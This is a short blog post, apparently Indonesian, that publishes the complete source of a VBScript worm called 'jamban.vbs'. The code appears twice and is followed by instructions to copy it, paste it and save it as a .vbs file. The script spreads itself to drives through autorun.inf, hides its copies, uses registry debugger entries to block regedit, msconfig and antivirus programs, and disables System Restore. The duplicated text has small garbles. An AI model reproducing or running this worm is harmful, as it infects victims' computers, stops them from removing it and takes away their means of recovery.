-------------------------script begin--------------------------
On error resume next
Dim dini,latrine,i,loph,you,mf,isi,cabimb,jamban,nt,check,sd
On error resume next
Dim dini,latrine,i,loph,you,mf,isi,cabimb,jamban,nt,check,sd
Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe jamban.vbs"
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
Size = mf.size
Check = mf.drive.drivetype
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream
Dini = dini & text.readline
Dini = dini & vbcrlf
Loop
Do
Set i = you.getspecialfolder(0)
Set latrine = you.getspecialfolder(1)
Set cabimb = you.getfile(latrine & "\ jamban.vbs ")
Cabimb.attributes = 32
Set cabimb = you.createtextfile(latrine & "\ jamban.vbs ",2,true)
Cabimb.write dini
Cabimb.close
Set cabimb = you.getfile(latrine & "\hck3d.vbs")
Cabimb.attributes = 39
For each loph in you.drives
If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then
Set cabimb=you.getfile(loph.path &"\ jamban.sys.vbs ")
Cabimb.attributes =32
Set cabimb=you.createtextfile(loph.path &"\ jamban.vbs ",2,true)
Cabimb.write dini
Cabimb.close
Set cabimb=you.getfile(loph.path &"\ jamban.vbs ")
Cabimb.attributes = 39
Set cabimb=you.getfile(loph.path &"\autorun.inf")
Cabimb.attributes = 32
Set cabimb=you.createtextfile(loph.path &"\autorun.inf",2,true)
Cabimb.write isi
Cabimb.close
Set cabimb= you.getfile(loph.path &"\autorun.inf")
Cabimb.Cabimb.attributes=39
End if
Next
'Manipulasi registry
Set jamban = createobject("wscript.shell")
'Banyak yang dirubah..liat ndiri deh aaah
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"
jamban.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"
jamban.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"
jamban.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"
jamban.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"
If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
Set sd = createobject("wscript.shell")
Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname
-----------------------end script-----------------------------
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
Size = mf.size
Check = mf.drive.drivetype
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream
Dini = dini & text.readline
Dini = dini & vbcrlf
Loop
Do
Set i = you.getspecialfolder(0)
Set latrine = you.getspecialfolder(1)
Set cabimb = you.getfile(latrine & "\ jamban.vbs ")
Cabimb.attributes = 32
Set cabimb = you.createtextfile(latrine & "\ jamban.vbs ",2,true)
Cabimb.write dini
Cabimb.close
Set cabimb = you.getfile(latrine & "\hck3d.vbs")
Cabimb.attributes = 39
For each loph in you.drives
If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then
Set cabimb=you.getfile(loph.path &"\ jamban.sys.vbs ")
Cabimb.attributes =32
Set cabimb=you.createtextfile(loph.path &"\ jamban.vbs ",2,true)
Cabimb.write dini
Cabimb.close
Set cabimb=you.getfile(loph.path &"\ jamban.vbs ")
Cabimb.attributes = 39
Set cabimb=you.getfile(loph.path &"\autorun.inf")
Cabimb.attributes = 32
Set cabimb=you.createtextfile(loph.path &"\autorun.inf",2,true)
Cabimb.write isi
Cabimb.close
Set cabimb= you.getfile(loph.path &"\autorun.inf")
Cabimb.Cabimb.attributes=39
End if
Next
'Manipulasi registry
Set jamban = createobject("wscript.shell")
'Banyak yang dirubah..liat ndiri deh aaah
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""
jamban.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"
jamban.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"
jamban.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"
jamban.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"
jamban.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"
If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
Set sd = createobject("wscript.shell")
Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname
-----------------------end script-----------------------------
Ha..tinggal kopi pastel aja ko..
enak to ?
save di notepad dengan file name : jamban.vbs
save as type :all files
No comments:
thanks..